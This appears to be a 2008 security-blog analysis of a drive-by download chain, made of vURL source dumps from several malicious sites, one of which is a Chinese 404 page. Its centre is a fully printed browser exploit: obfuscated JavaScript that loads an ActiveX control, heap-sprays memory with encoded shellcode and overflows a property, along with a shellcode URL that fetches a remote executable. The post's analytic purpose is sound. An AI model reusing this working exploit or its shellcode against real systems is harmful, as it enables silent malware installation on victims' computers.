<script type="text/javascript"><!--
var EXlogin='kkology' // Login
var EXvsrv='s11' // VServer
EXs=screen;EXw=EXs.width;navigator.appName!="Netscape"?
EXb=EXs.colorDepth:EXb=EXs.pixelDepth;
navigator.javaEnabled()==1?EXjv="y":EXjv="n";
EXd=document;EXw?"":EXw="na";EXb?"":EXb="na";
EXd.write("<img src=http://e2.extreme-dm.com",
"/"+EXvsrv+".g?login="+EXlogin+"&",
"jv="+EXjv+"&j=y&srw="+EXw+"&srb="+EXb+"&",
"l="+escape(EXd.referrer)+" height=1 width=1>");//-->
</script><noscript><div id="neXTReMe"><img height="1" width="1" alt=""
src="http://e2.extreme-dm.com/s11.g?login=kkology&j=n&jv=n" />
</div></noscript></div>
<script language="javascript" type="text/javascript">

window.status="Done"

</script>
</body>
</html>


*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.kkexe.com/key.htm
Server IP: 125.91.13.147 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:13:35:13
*****************************************************************
<iframe src="http://www.bbcseek.com/seo.php?ref=itxiaoke" width="780" height="700" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>


http://www0.douhunqn.cn/csrss/real11.htm

This is detected as HTML/Shellcode.Gen and contains;

*****************************************************************

vURL Desktop Edition v0.3.5 Results

Source code for: http://www0.douhunqn.cn/csrss/real11.htm

Server IP: 121.11.76.85 [ Resolution failed ]

hpHosts Status: Listed [ Class: EXP ]

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 1

iFrames: 0

via Proxy: MontanaMenagerie (US)

Date: 16 September 2008

Time: 03:18:26:18

*****************************************************************

<SCRIPT language="javascript">

Hello="Hi";

var tcsafeobj="o"+"b"+"j"+"e"+"c"+"t";

tcsafe=document.createElement(tcsafeobj);

var tcsafeid="clsid:2F542A2E-EDC9-4B";

var tcsafeids="F7-8CB1-87C9919F7F93";

var tcsafeidx=tcsafeid+tcsafeids;

tcsafe["setAttribute"]("classid", tcsafeidx);

var tcsafe_ulr="%u7468%u7074%u2F3A%u772F%u7777%u702E%u6570%u6578%u632E%u6D6F%u632F%u7273%u7373%u722F%u6E6F%u6C64%u336C%u2E32%u7865%u0065%u0000";

var yt1="%uffff%ua164%u0030%u0000%u408b";

var yt2="%u6856%u4e8e%uec0e%ua3e8%u0000";

var yt3="%u8900%u1445%ue0bb%u020f%u8900";

var yt4="%u0544%u652c%u0000%u5600%u8d56";

var yt5="%u0320%u33f3%u49c9%uad41%uc303";

var yt6="%u5e00%u80bf%u020c%ub900%u0100";

var yt7="%u0c47%u6165%u0070%u5057%u55ff";

var yt8="%u1055%u06c7%u0c80%u0002%uc481";

var tcsafecode = window["unescape"]("%u90"+"90"+"%u90"+"90"+"%u90"+"90"+

"%u6090"+"%u17eb%u645e%u30a1"+"%u0000%u0500%u0800%u0000%uf88b"+"%u00b9"+

"%u0004"+"%uf300%uffa4%ue8e0%uffe4"+yt1+"%u8b0c"+

"%u1c70"+"%u8bad%u0870%uec81%u0200"+"%u0000%uec8b%ue8bb%u020f%u8b00"+"%u8503"+

"%u0fc0"+"%ubb85%u0000%uff00%ue903"+"%u0221%u0000%u895b%u205d%u6856"+"%ufe98"+

"%u0e8a"+"%ub1e8%u0000%u8900%u0c45"+yt2+"%u8900"+

"%u0445"+"%u6856%u79c1%ub8e5%u95e8"+"%u0000%u8900%u1c45%u6856%uc61b"+"%u7946"+

"%u87e8"+"%u0000%u8900%u1045%u6856"+"%ufcaa%u7c0d%u79e8%u0000%u8900"+"%u0845"+

"%u6856"+"%u84e7%ub469%u6be8%u0000"+yt3+"%u3303"+

"%uc7f6"+"%u2845%u5255%u4d4c%u45c7"+"%u4f2c%u004e%u8d00%u285d%uff53"+"%u0455"+

"%u6850"+"%u1a36%u702f%u3fe8%u0000"+"%u8900%u2445%u7f6a%u5d8d%u5328"+"%u55ff"+

"%uc71c"+"%u0544%u5c28%u652e%uc778"+yt4+"%u287d"+

"%uff57"+"%u2075%uff56%u2455%u5756"+"%u55ff%ue80c%u0062%u0000%uc481"+"%u0200"+

"%u0000"+"%u3361%uc2c0%u0004%u8b55"+"%u51ec%u8b53%u087d%u5d8b%u560c"+"%u738b"+

"%u8b3c"+"%u1e74%u0378%u56f3%u768b"+yt5+"%u3356"+

"%u0ff6"+"%u10be%uf23a%u0874%ucec1"+"%u030d%u40f2%uf1eb%ufe3b%u755e"+"%u5ae5"+

"%ueb8b"+"%u5a8b%u0324%u66dd%u0c8b"+"%u8b4b%u1c5a%udd03%u048b%u038b"+"%u5ec5"+

"%u595b"+"%uc25d%u0008%u92e9%u0000"+yt6+"%u0000"+

"%ua4f3"+"%uec81%u0100%u0000%ufc8b"+"%uc783%uc710%u6e07%u6474%uc76c"+"%u0447"+

"%u006c"+"%u0000%uff57%u0455%u4589"+"%uc724%u5207%u6c74%uc741%u0447"+"%u6c6c"+

"%u636f"+"%u47c7%u6108%u6574%uc748"+yt7+"%u8b08"+

"%ub8f0"+"%u0fe4%u0002%u3089%u07c7"+"%u736d%u6376%u47c7%u7204%u0074"+"%u5700"+

"%u55ff"+"%u8b04%u3c48%u8c8b%u8008"+"%u0000%u3900%u0834%u0474%uf9e2"+"%u12eb"+

"%u348d"+"%u5508%u406a%u046a%uff56"+yt8+"%u0100"+

"%u0000"+"%ue8c3%uff69%uffff%u048b"+"%u5324%u5251%u5756%uecb9%u020f"+"%u8b00"+

"%u8519"+"%u75db%u3350%u33c9%u83db"+"%u06e8%ub70f%u8118%ufffb%u0015"+"%u7500"+

"%u833e"+"%u06e8%ub70f%u8118%ufffb"+"%u0035%u7500%u8330%u02e8%ub70f"+"%u8318"+

"%u6afb"+"%u2575%uc083%u8b04%ub830"+"%u0fe0%u0002%u0068%u0000%u6801"+"%u1000"+

"%u0000"+"%u006a%u10ff%u0689%u4489"+"%u1824%uecb9%u020f%uff00%u5f01"+"%u5a5e"+

"%u5b59"+"%ue4b8%u020f%uff00%ue820"+"%ufdda%uffff"+tcsafe_ulr);



var bigblock = unescape("%u0C0C" + "%u0C0C");

var headersize = 20;

var slackspace = headersize + tcsafecode.length;

while (bigblock.length < slackspace) bigblock += bigblock;

var fillblock = bigblock.substring(0,slackspace);

var block = bigblock["substring"](0,bigblock.length - slackspace);

while (block.length + slackspace < 0x40000) block = block + block + fillblock;



var memory = new window["Array"]();

var tcsafes = memory;

for (i = 0; i < 400; i++)

{

tcsafes[i] = block + tcsafecode

}



var buf = '';

while (buf.length < 32) buf = buf + unescape("%0C");



var m = '';



m = tcsafe.Console;

tcsafe.Console = buf;

tcsafe.Console = m;



m = tcsafe.Console;

tcsafe.Console = buf;

tcsafe.Console = m;

</script>


Once again, this downloads rondll32.exe

http://www0.douhunqn.cn/csrss/lzx.htm
http://www0.douhunqn.cn/csrss/real10.htm
http://www0.douhunqn.cn/csrss/Bfyy.htm


All 3 of these seem to return what looks like a 404, but I can't read a bleedin word, so am not 100% sure;

*****************************************************************

vURL Desktop Edition v0.3.5 Results

Source code for: http://www0.douhunqn.cn/csrss/Bfyy.htm

Server IP: 121.11.76.85 [ Resolution failed ]

hpHosts Status: Listed [ Class: EXP ]

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 0

iFrames: 0

via Proxy: MontanaMenagerie (US)

Date: 16 September 2008

Time: 03:21:39:21

*****************************************************************

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<HTML><HEAD><TITLE>ÎÞ·¨ÕÒµ½¸ÃÒ³</TITLE>

<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">

<STYLE type="text/css">

BODY { font: 9pt/12pt ËÎÌå }

H1 { font: 12pt/15pt ËÎÌå }

H2 { font: 9pt/12pt ËÎÌå }

A:link { color: red }

A:visited { color: maroon }

</STYLE>

</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>



<h1>ÎÞ·¨ÕÒµ½¸ÃÒ³</h1>

ÄúÕýÔÚËÑË÷µÄÒ³Ãæ¿ÉÄÜÒѾ­É¾³ý¡¢¸üÃû»òÔÝʱ²»¿ÉÓá£

<hr>

<p>Çë³¢ÊÔÒÔϲÙ×÷£º</p>

<ul>

<li>È·±£ä¯ÀÀÆ÷µÄµØÖ·À¸ÖÐÏÔʾµÄÍøÕ¾µØÖ·µÄƴдºÍ¸ñʽÕýÈ·ÎÞÎó¡£</li>

<li>Èç¹ûͨ¹ýµ¥»÷Á´½Ó¶øµ½´ïÁ˸ÃÍøÒ³£¬ÇëÓëÍøÕ¾¹ÜÀíÔ±ÁªÏµ£¬Í¨ÖªËûÃǸÃÁ´½ÓµÄ¸ñʽ²»ÕýÈ·¡£

</li>

<li>µ¥»÷<a href="javascript:history.back(1)">ºóÍË</a>°´Å¥³¢ÊÔÁíÒ»¸öÁ´½Ó¡£</li>

</ul>

<h2>HTTP ´íÎó 404 - Îļþ»òĿ¼δÕÒµ½¡£<br>Internet ÐÅÏ¢·þÎñ (IIS)</h2>

<hr>

<p>¼¼ÊõÐÅÏ¢£¨Îª¼¼ÊõÖ§³ÖÈËÔ±Ìṩ£©</p>

<ul>

<li>תµ½ <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft ²úÆ·Ö§³Ö·þÎñ</a>²¢ËÑË÷°üÀ¨“HTTP”ºÍ“404”µÄ±êÌâ¡£</li>

<li>´ò¿ª“IIS °ïÖú”£¨¿ÉÔÚ IIS ¹ÜÀíÆ÷ (inetmgr) ÖзÃÎÊ£©£¬È»ºóËÑË÷±êÌâΪ“ÍøÕ¾ÉèÖÔ¡¢“³£¹æ¹ÜÀíÈÎÎñ”ºÍ“¹ØÓÚ×Ô¶¨Òå´íÎóÏûÏ¢”µÄÖ÷Ìâ¡£</li>

</ul>



</TD></TR></TABLE></BODY></HTML>

1 comment:

Iván Villegas said...

see similar atack on http://cienciainformatica.blogspot.com